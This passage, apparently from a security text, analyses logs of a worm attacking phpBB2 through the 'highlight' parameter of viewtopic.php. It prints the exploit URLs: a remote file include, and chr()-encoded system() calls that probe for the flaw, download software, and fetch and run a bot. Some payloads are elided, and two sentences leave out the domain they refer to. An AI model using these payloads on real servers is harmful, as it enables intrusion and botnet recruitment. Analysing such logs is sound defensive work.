The PHPBB Worm

This section exhibits example logs created by a worm exploiting a remote code execution vulnerability within phpBB2. The exploit was sent in the value of the "highlight" parameter of the application's viewtopic.php script. Accessing the following URL downloaded the file root.txt from the domain /phpBB2/viewtopic.php?p=1277&highlight=%2527.$poster=include($_GET[m]).%2527&m=

The worm checks if the PHPBB installation is vulnerable by fetching the following URL, by attempting to print "jSVowMsd" in the output. If it finds "jSVowMsd" in the requested page, that is, if the vulnerability is present in the application, the targeted PHP server will then run the next two commands.

/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114) ... chr(34))%252E%2527

The following downloads software from
/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(119)%252Echr(103) ... chr(56))%252E%2527

Finally, a bot is downloaded and executed in an attempt to join a botnet:
/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(119)%252Echr(103)%252Echr(101) ... chr(110)%252Echr(99)%252Echr(97))%252E%2527